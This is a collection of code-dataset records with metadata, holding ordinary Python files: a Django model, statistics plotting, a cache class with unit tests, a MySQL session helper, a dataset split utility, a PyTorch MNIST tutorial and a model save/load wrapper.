"christeropda/BED-2056-assignments3-5", "sub_path": "assignment3-5/assignment3.py", "file_name": "assignment3.py", "file_ext": "py", "file_size_in_byte": 1078, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "attribute"}]} +{"seq_id": "23188630045", "text": "#Modelo Profesion\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nclass Profesion(models.Model):\n \n descripcion = 
models.CharField(\n unique=True,\n max_length=50,\n error_messages={\n 'unique': 'Profesion ya existe'\n }\n )\n activo = models.BooleanField(default=True)\n creado = models.DateTimeField(auto_now_add=True)\n modificado = models.DateTimeField(auto_now=True)\n\n usuario = models.ForeignKey(\n User, \n related_name='usuarioProfesion',\n on_delete=models.PROTECT\n )\n\n def __str__(self):\n return self.descripcion\n\n\n def delete(self, *args):\n self.activo = False\n self.save()\n return True", "repo_name": "raulIxc85/Proyecto-Aula-Virtual", "sub_path": "api/models/profesion.py", "file_name": "profesion.py", "file_ext": "py", "file_size_in_byte": 729, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.models.Model", "line_number": 5, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 5, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 7, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 16, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 18, "usage_type": "name"}, {"api_name": "django.db.models.PROTECT", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "21913147847", "text": "# Importing required libraries\n'''\nA probability distribution is a statistical function that describes the likelihood of obtaining the possible values that \na random variable can take. By this, we mean the range of values that a parameter can take when we randomly pick up values \nfrom it.\n\nA Normal Distribution is also known as a Gaussian distribution or famously Bell Curve. \nPeople use both words interchangeably, but it means the same thing. 
It is a continuous probability distribution.\n\nThe probability density function (pdf) for Normal Distribution:\n\n    f(x) = 1 / (sd * sqrt(2 * pi)) * exp(-0.5 * ((x - mean) / sd)**2)\n\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nfrom scipy.stats import binom\nfrom numpy import random\n\n###UniModal Density Function\n \n# Creating a series of data of in range of 1-50.\nx = np.linspace(1,50,200)\n\n#print(x)\n \n#Creating a Function.\ndef normal_dist(x , mean , sd):\n    #prob_density = (np.pi*sd) * np.exp(-0.5*((x-mean)/sd)**2)\n    prob_density = (1/((2*np.pi)**0.5 *sd)) * np.exp(-0.5*((x-mean)/sd)**2)\n    return prob_density\n \n#Calculate mean and Standard deviation.\nmean = np.mean(x)\nsd = np.std(x)\n \n#Apply function to the data.\npdf = normal_dist(x,mean,sd)\n \n#Plotting the Results\nplt.plot(x,pdf , color = 'red')\nplt.xlabel('Data points')\nplt.ylabel('Probability Density')\nplt.show()\n\n###Multimodal Density Function\n#here we are using multinomial function to generate distributions of size 1000 with 3 outcomes each having probability 1/3\nsb.distplot(random.multinomial(size=1000,n=3,pvals=[1/3,1/3,1/3]), hist=True, label='normal')\n#plotting the graph\nplt.show()\n\n###To generate a random sample with a sample size of 200, which follows a normal distribution \n###with a mean of 100 and a standard deviation of 20\nSampleSize = 200\nmean = 100\nsd = 20\nRandomSample = np.random.normal(mean, sd, SampleSize)\nprint(\"Random Sample: {}\".format(RandomSample))\n\n#The distribution of diastolic blood pressure for men is normally distributed with a mean of about 80 and \n#a standard deviation of 20.\nSampleSize = 200\nmean = 80\nsd = 20\nRandomSample = np.random.normal(mean, sd, SampleSize)\nprint(\"Random Sample: {}\".format(RandomSample))\nplt.hist(RandomSample)\nplt.show()\n\n\n\n'''\n###Multimodal Density Function\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import binom\n \n# Creating a series of data of in range of 1-50.\nx = np.linspace(1,50,50)\nx1 = np.linspace(20,80,60)\nx2 = np.linspace(10,100,90)\n\nX = np.concatenate([x, x1, x2])\n\nprint(x)\nprint(x1)\nprint(x2)\nprint(X)\n \n#Creating a Function.\ndef normal_dist(X , mean , sd):\n    prob_density = (np.pi*sd) * np.exp(-0.5*((X-mean)/sd)**2)\n    #prob_density = (1/((2*np.pi)**0.5 *sd)) * np.exp(-0.5*((x-mean)/sd)**2)\n    return prob_density\n \n#Calculate mean and Standard deviation.\nmean = np.mean(X)\nsd = np.std(X)\n \n#Apply function to the data.\npdf = normal_dist(X,mean,sd)\n \n#Plotting the Results\nplt.plot(X, pdf , color = 'red')\nplt.xlabel('Data points')\nplt.ylabel('Probability Density')\nplt.show()\n\n\nN=400\nmu, sigma = 100, 5\nmu2, sigma2 = 10, 40\nX1 = np.random.normal(mu, sigma, N)\nX2 = np.random.normal(mu2, sigma2, N)\nX = np.concatenate([X1, X2])\ncount, bins, ignored = plt.hist(X)\nplt.plot(bins,X)\nplt.show()\n\n'''\n\n'''\nimport matplotlib.pyplot as plt\nfrom scipy.stats import binom\n# setting the values\n# of n and p\nn = 100\np = 0.6\n# defining list of r values\nr_values = list(range(n + 1))\n# list of pmf values\ndist = [binom.pmf(r, n, p) for r in r_values ]\n# plotting the graph\nplt.bar(r_values, dist)\nplt.plot(r_values, dist)\nplt.show()\n'''\n\n\n'''\n###\n \n# Creating a series of data of in range of 1-50.\n#x = np.linspace(1,50,200)\n\n# Creating a series of data of in range of 100.\nmean, sd = 100, 20\nx = np.random.normal(mean, sd, 200)\n\nprint(x)\n \n#Creating a Function.\ndef normal_dist(bins , mean , sd):\n    #prob_density = (np.pi*sd) * np.exp(-0.5*((x-mean)/sd)**2)\n    prob_density = 1/(sd * 
np.sqrt(2 * np.pi)) * np.exp( - (bins - mean)**2 / (2 * sd**2) )\n return prob_density\n \n#Calculate mean and Standard deviation.\n#mean = np.mean(x)\n#sd = np.std(x)\n \n#Apply function to the data.\n#pdf = normal_dist(x,mean,sd)\n#pdf = normal_dist(x,mean,50)\n \n#Plotting the Results\n#plt.plot(x,pdf , color = 'red')\n#plt.xlabel('Data points')\n#plt.ylabel('Probability Density')\n#plt.show()\n\n#Plotting the Results\ncount, bins, ignored = plt.hist(x, 30, density=True)\n#print(bins)\n#plt.plot(bins, normal_dist(bin , mean , sd), linewidth=2, color='r')\nplt.plot(bins, 1/(sd * np.sqrt(2 * np.pi)) * np.exp( - (bins - mean)**2 / (2 * sd**2) ) ,linewidth=2, color='r')\nplt.show()\n'''", "repo_name": "Ayad-Mihidabi-Khan-Jitu/Workspace-Learning", "sub_path": "LAB_CSE/LAB_SimulationAndModeling/Unimodal_Multimodal_Normal_D.py", "file_name": "Unimodal_Multimodal_Normal_D.py", "file_ext": "py", "file_size_in_byte": 4540, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.linspace", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random.multinomial", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}]} +{"seq_id": "30927321575", "text": "'''\nThe Cache class caches data, with a delegate to get missing data\n'''\n\nfrom fileinput import filename\nimport json\n\nclass Cache:\n\tdef __init__(self, getAction):\n\t\tself.getAction = getAction\n\t\tself.data = {}\n\t\n\tdef __getitem__(self, key):\n\t\tif key not in self.data:\n\t\t\tvalue = self.getAction(key)\n\t\t\tself.data[key] = value\n\t\t\treturn value\n\t\treturn self.data[key]\n\t\n\tdef __setitem__(self, key, newvalue):\n\t\tself.data[key] = 
newvalue\n\t\n\tdef has(self, key):\n\t\treturn key in self.data\n\t\n\tdef __contains__(self, key):\n\t\treturn key in self.data\n\n\nclass JsonCache(Cache):\n\tdef __init__(self, getAction, filename):\n\t\tsuper().__init__(getAction)\n\t\tself.filename = filename\n\t\n\tdef __getitem__(self, key):\n\t\tif not isinstance(key, str):\n\t\t\traise RuntimeError('Keys need to be strings!')\n\t\treturn super().__getitem__(key)\n\t\n\tdef __setitem__(self, key, newvalue):\n\t\tif not isinstance(key, str):\n\t\t\traise RuntimeError('Keys need to be strings!')\n\t\treturn super().__setitem__(key, newvalue)\n\t\n\tdef load(self):\n\t\twith open(self.filename, 'r') as json_file:\n\t\t\tself.data = json.load(json_file)\n\t\n\tdef save(self):\n\t\twith open(self.filename, 'w') as json_file:\n\t\t\tjson.dump(self.data, json_file)\n\n#------------------------------------------------------------------------------------------\n\nimport unittest, pathlib, os\n\nclass CacheTests(unittest.TestCase):\n\tGetCallCount = 0\n\tGetDelegateReturn = '123'\n\n\t@staticmethod\n\tdef GetDelegate(key):\n\t\tCacheTests.GetCallCount += 1\n\t\treturn CacheTests.GetDelegateReturn\n\t\n\tdef setUp(self):\n\t\tCacheTests.GetCallCount = 0\n\n\tdef test_get_once_action_called(self):\n\t\tcache = Cache(CacheTests.GetDelegate)\n\t\tresult = cache[123]\n\t\tself.assertEqual('123', result)\n\t\tself.assertEqual(1, CacheTests.GetCallCount)\n\n\tdef test_get_multiple_action_called(self):\n\t\tcache = Cache(CacheTests.GetDelegate)\n\t\tresult = [ cache[123] for _ in range(10) ]\n\t\tself.assertTrue(all(x == '123' for x in result))\n\t\tself.assertEqual(1, CacheTests.GetCallCount)\n\n\tdef test_set_multiple_action_not_called(self):\n\t\tcache = Cache(CacheTests.GetDelegate)\n\t\tfor i in range(10):\n\t\t\tcache[i] = i\n\t\tself.assertEqual(0, CacheTests.GetCallCount)\n\t\tself.assertTrue(all([cache[i] == i for i in range(10)]))\n\t\tself.assertEqual(0, CacheTests.GetCallCount)\n\t\n\tdef test_has_check(self):\n\t\tcache = Cache(CacheTests.GetDelegate)\n\t\tcache[123] = '123'\n\t\tself.assertTrue(cache.has(123))\n\t\tself.assertTrue(123 in cache)\n\t\tself.assertFalse(cache.has('abc'))\n\t\tself.assertFalse('abc' in cache)\n\n\nclass JsonCacheTests(CacheTests):\n\tJsonFilename = os.path.join(pathlib.Path(__file__).parent.resolve(), 'test_output.json')\n\n\tdef test_save_load(self):\n\t\tjsoncache1 = JsonCache(CacheTests.GetDelegate, self.JsonFilename)\n\t\tjsoncache1['123'] = '123'\n\t\tjsoncache1['abc'] = 'abc'\n\t\tjsoncache1.save()\n\n\t\tjsoncache2 = JsonCache(CacheTests.GetDelegate, self.JsonFilename)\n\t\tjsoncache2.load()\n\t\tself.assertTrue('123' in jsoncache2)\n\t\tself.assertEqual('123', jsoncache2['123'])\n\t\tself.assertTrue('abc' in jsoncache2)\n\t\tself.assertEqual('abc', jsoncache2['abc'])\n\t\n\tdef test_get_set_nonstring(self):\n\t\tjsoncache = JsonCache(CacheTests.GetDelegate, self.JsonFilename)\n\t\twith self.assertRaises(RuntimeError):\n\t\t\tjsoncache[123] = 123\n\t\t\n\t\twith self.assertRaises(RuntimeError):\n\t\t\tjsoncache[1.1] = 123\n\n\n\n\nif __name__ == \"__main__\":\n\tunittest.main()\n", "repo_name": "tpendse/PythonSandbox", "sub_path": "cache.py", "file_name": "cache.py", "file_ext": "py", "file_size_in_byte": 3300, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fileinput.filename", "line_number": 33, "usage_type": "name"}, {"api_name": "json.load", "line_number": 47, "usage_type": "call"}, {"api_name": "json.dump", 
"line_number": 51, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 99, "usage_type": "call"}, {"api_name": "os.path", "line_number": 99, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 99, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "31164765254", "text": "import contextlib\nimport logging\n\n\nclass MySQLSession(object):\n\n def __init__(self, conn):\n self._conn = conn\n self._cursor = conn.cursor(dictionary=True)\n self._log = logging.getLogger(__name__)\n\n def execute(self, statement, values):\n self._log.debug(\"Execute statement %s with values %s\",\n statement, values)\n self._cursor.execute(statement, values)\n return self._cursor\n\n def rollback(self):\n self._conn.rollback()\n\n def commit(self):\n self._conn.commit()\n\n def close(self):\n self._conn.close()\n\n\n@contextlib.contextmanager\ndef session_manager(engine, session=None):\n if session is None:\n session = engine.get_session()\n try:\n yield session\n session.commit()\n except Exception:\n session.rollback()\n raise\n finally:\n session.close()\n else:\n yield session\n", "repo_name": "phantomii/restalchemy", "sub_path": "restalchemy/storage/sql/sessions.py", "file_name": "sessions.py", "file_ext": "py", "file_size_in_byte": 955, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "contextlib.contextmanager", "line_number": 28, "usage_type": "attribute"}]} +{"seq_id": "30689210977", "text": "from datetime import date\nfrom enum import Enum\n\n\nclass DayStatus(Enum):\n BAD = -1\n NORMAL = 0\n GOOD = 1\n\n def __str__(self):\n if self.value == -1:\n return \"Плохо\"\n elif self.value == 0:\n return \"Нормально\"\n elif self.value == 1:\n return \"Хорошо\"\n\n\nclass Day:\n def __init__(self, day_date: date = None, day_status: DayStatus = None):\n self.date = day_date\n self.status = day_status\n\n def __eq__(self, other):\n if isinstance(other, Day):\n return self.date == other.date and self.status == other.status\n return False\n\n def __ne__(self, other):\n return not self.__eq__(other)\n", "repo_name": "Tananndart/BeholderBot", "sub_path": "domain/day.py", "file_name": "day.py", "file_ext": "py", "file_size_in_byte": 714, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "enum.Enum", "line_number": 5, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 20, "usage_type": "name"}]} +{"seq_id": "10410809939", "text": "import shutil\nfrom pathlib import Path\nimport numpy as np\nimport pandas as pd\n\ndef create_split(data_dir, train_prop=0.8, val_prop=0, by_subject=False):\n \"\"\"Split the Dataset directory into training, validation and testing sets\n\n :param data_dir: the directory of the Dataset\n :type data_dir: str or pathlike\n :param train_prop: the proportion of data to go in the training set, defaults to 0.8\n :type train_prop: float, optional\n :param val_prop: the proportion of data to go in the validation set, defaults to 0\n :type val_prop: float, optional\n :param by_subject: whether to create splits by subject or by trials, defaults to False\n :type by_subject: bool, optional\n \"\"\"\n assert (train_prop + val_prop) > 0 and (train_prop + val_prop) < 1, \"Sum of 
training and validation proportion must be greater than zero and less than one\"\n\n data_path = Path(data_dir)\n\n # shuffle all samples\n annotations_df = pd.read_csv(data_path / 'annotations.csv')\n shuffled_df = annotations_df.sample(frac=1)\n\n # randomly split samples into sets\n if not by_subject:\n # using length of dataframe, split by training/val/test proportions\n df_len = len(shuffled_df)\n train_i, val_i, test_i = int(train_prop*df_len), int((train_prop+val_prop)*df_len), df_len\n\n # generate group labels\n group_labels = np.concatenate((np.repeat('train', train_i), np.repeat('val', (val_i - train_i)), np.repeat('test', (test_i - val_i))))\n\n # otherwise, randomly split subjects into sets\n else:\n # get an array with unique subject IDs\n ids = shuffled_df['subject_id'].unique()\n\n # using length of subject ID array, split by training/val/test proportions\n ids_len = len(ids)\n train_i, val_i, test_i = int(train_prop*ids_len), int((train_prop+val_prop)*ids_len), ids_len\n\n # get subject labels and dict from ID to group\n subject_labels = np.concatenate((np.repeat('train', train_i), np.repeat('val', (val_i - train_i)), np.repeat('test', (test_i - val_i))))\n id_to_group = {ids[i]: subject_labels[i] for i in range(ids_len)}\n\n # generate group labels\n group_labels = shuffled_df['subject_id'].apply(lambda subject: id_to_group[subject])\n\n # add group labels to annotations file and save\n shuffled_df['group'] = group_labels\n shuffled_df.to_csv(data_path / 'annotations.csv')\n\n # make directories for sets and set specific annotation files\n for group in ['train', 'val', 'test']:\n group_path = data_path / group\n group_path.mkdir(parents=True, exist_ok=True)\n shuffled_df[shuffled_df['group'].str.match(group)].to_csv(group_path / 'annotations.csv')\n\n # move each file into its groups' directory\n shuffled_df.apply(lambda x: shutil.move(str(data_path / x['np_file']), str(data_path / x['group'] / x['np_file'])), axis=1)", "repo_name": "markt/neuroIN", "sub_path": "src/neuroIN/preprocessing/train_test_split.py", "file_name": "train_test_split.py", "file_ext": "py", "file_size_in_byte": 2879, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 45, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "7678119700", "text": "import numpy as np\nimport torch\n\nimport helper\n\nimport matplotlib.pyplot as plt\n\n# Setup the dataset\nfrom torchvision import datasets, transforms\n\n# Define a transform to normalize the data\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,)),\n ])\n\n# Download and load the training data\ntrainset = datasets.MNIST('~/.pytorch/MNIST_data/', download=True, train=True, transform=transform)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=64, shuffle=True)\n\ndataiter = iter(trainloader)\nimages, labels = dataiter.next()\nprint(type(images))\nprint(images.shape)\nprint(labels.shape)\n\nplt.imshow(images[1].numpy().squeeze(), cmap='Greys_r');\n# plt.show()\n\n\n# Flatten 
image tensor\ninputs = images.view(images.shape[0], -1)\n\n# Network parameters\nW1 = torch.randn(784, 256)\nB1 = torch.randn(256)\n\nW2 = torch.randn(256, 10)\nB2 = torch.randn(10)\n\n# Network functions\ndef activation(x):\n    return 1/(1+torch.exp(-x))\n\ndef softmax(x):\n    # print(x.shape)\n    # denominator = 0\n    # softmax_x = []\n    # for k in range (len(x)):\n    #     denominator += torch.exp(x[k])\n\n    return torch.exp(x)/torch.sum(torch.exp(x), dim=1).view(-1, 1)\n\n# forward propagation\nhidden = activation(torch.mm(inputs, W1) + B1)\noutput = softmax(torch.mm(hidden, W2) + B2)\n\n# print(\"Shape should be (64, 10)\")\n# print(output.shape)\n# print(\"Output should sum to 1\")\n# print(output.sum(dim=1))\n\n# print(output)\n\n##################################\n# Building Networks with PyTorch #\n##################################\nfrom torch import nn\n\nclass Network(nn.Module):\n    def __init__(self):\n        super().__init__()\n\n        # Inputs to hidden layer linear transformation\n        # Weights and bias tensors are automatically created\n        self.hidden = nn.Linear(784, 256)\n        # Output layer, 10 units - one for each digit\n        self.output = nn.Linear(256, 10)\n\n        # Define sigmoid activation and softmax output\n        self.sigmoid = nn.Sigmoid()\n        self.softmax = nn.Softmax(dim=1) # dim=1 calculates softmax across columns\n\n    def forward(self, x):\n        # Pass the input tensor through each of our operations\n        x = self.hidden(x)\n        x = self.sigmoid(x)\n        x = self.output(x)\n        x = self.softmax(x)\n\n        return x\n\n# model = Network()\n# print(model)\n\n##################################################\n# Create network with torch.nn.functional module #\n##################################################\n\nimport torch.nn.functional as F\n\nclass Network(nn.Module):\n    def __init__(self):\n        super().__init__()\n        # Inputs to hidden layer linear transformation\n        # Weights and bias tensors are automatically created\n        self.hidden = nn.Linear(784, 256)\n        # Output layer, 10 units - one for each digit\n        self.output = nn.Linear(256, 10)\n\n    def forward(self, x):\n        # Hidden layer with sigmoid activation\n        x = F.sigmoid(self.hidden(x))\n        # Output layer with softmax activation\n        x = F.softmax(self.output(x), dim=1)\n\n        return x\n\n##################\n# Custom Network #\n##################\nclass Network(nn.Module):\n    def __init__(self):\n        super().__init__()\n\n        self.fc1 = nn.Linear(784, 128)\n        self.fc2 = nn.Linear(128, 64)\n        self.fc3 = nn.Linear(64, 10)\n\n    def forward(self, x):\n        x = torch.sigmoid(self.fc1(x))\n        x = torch.sigmoid(self.fc2(x))\n        x = F.softmax(self.fc3(x), dim=1)\n\n        return x\n\nmodel = Network()\n# print(model)\n\n# Set biases to all zeros\nmodel.fc1.bias.data.fill_(0)\n\n# Custom weight initialization\nmodel.fc1.weight.data.normal_(std=0.01)\n\n# Grab some data\ndataiter = iter(trainloader)\nimages, labels = dataiter.next()\n\n# Resize images into a 1D vector, new shape is (batch size, color channels, image pixels)\nimages.resize_(images.shape[0], 1, 784)\n\n# Forward pass through the network\nimg_idx = 0\nps = model.forward(images[img_idx,:])\n\nimg = images[img_idx]\nhelper.view_classify(img.view(1, 28, 28), ps)\n\n#######################\n# Using nn.Sequential #\n#######################\n\n# Hyperparameters\ninput_size = 784\nhidden_sizes = [128, 64]\noutput_size = 10\n\n# Build a feed-forward network\nmodel = nn.Sequential(nn.Linear(input_size, hidden_sizes[0]),\n                      nn.ReLU(),\n                      nn.Linear(hidden_sizes[0], hidden_sizes[1]),\n                      nn.ReLU(),\n                      nn.Linear(hidden_sizes[1], output_size),\n                      nn.Softmax(dim=1))\n\nprint(model)\n\n# Forward pass through the network and display 
output\nimages, labels = next(iter(trainloader))\nimages.resize_(images.shape[0], 1, 784)\nps = model.forward(images[0,:])\nhelper.view_classify(images[0].view(1, 28, 28), ps)\n", "repo_name": "LiamHz/deep-learning-pytorch", "sub_path": "intro-to-pytorch/NeuralNetworksWithPyTorch.py", "file_name": "NeuralNetworksWithPyTorch.py", "file_ext": "py", "file_size_in_byte": 4740, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torchvision.transforms.Compose", "line_number": 12, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 12, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 12, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 13, "usage_type": "name"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 18, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.randn", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 69, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 101, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.functional.sigmoid", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 112, "usage_type": "name"}, {"api_name": "torch.nn.functional.softmax", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 
121, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 125, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 126, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 127, "usage_type": "name"}, {"api_name": "torch.sigmoid", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 132, "usage_type": "name"}, {"api_name": "helper.view_classify", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 169, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 171, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 172, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "helper.view_classify", "line_number": 182, "usage_type": "call"}]} +{"seq_id": "11751968618", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n    File Name:  basemodel.py\n    Description:\n    Author: GU Tianyi\n    date:  2022/4/4\n    desc:\n-------------------------------------------------\n\"\"\"\nimport logging\nimport os\nimport torch\nimport time\n\nclass BasicModel(torch.nn.Module):\n    def __init__(self):\n        \"\"\"\n        Wraps nn.Module and mainly adds the save and load helper methods\n        \"\"\"\n        super(BasicModel, self).__init__()\n        self.model_name = str(self.__class__.__name__)\n\n    def load(self, path):\n        \"\"\"\n        Load model weights from the given path\n        :param path: str (path to the checkpoint file)\n        :return:\n        \"\"\"\n        self.load_state_dict(torch.load(path))\n\n    def save(self, name=None):\n        \"\"\"\n        Save the model; by default the file name is \"model name + timestamp\"\n        :param name: str (target file name)\n        :return:\n        \"\"\"\n        if name is None:\n            if not os.path.exists('./checkpoints'):\n                os.makedirs('./checkpoints')\n            prefix = 'checkpoints/' + self.model_name + '_'\n            name = time.strftime(prefix + '%m%d_%H:%M:%S.pth')\n        torch.save(self.state_dict(), name)", "repo_name": "gutianyi/nlp_arsenal", "sub_path": 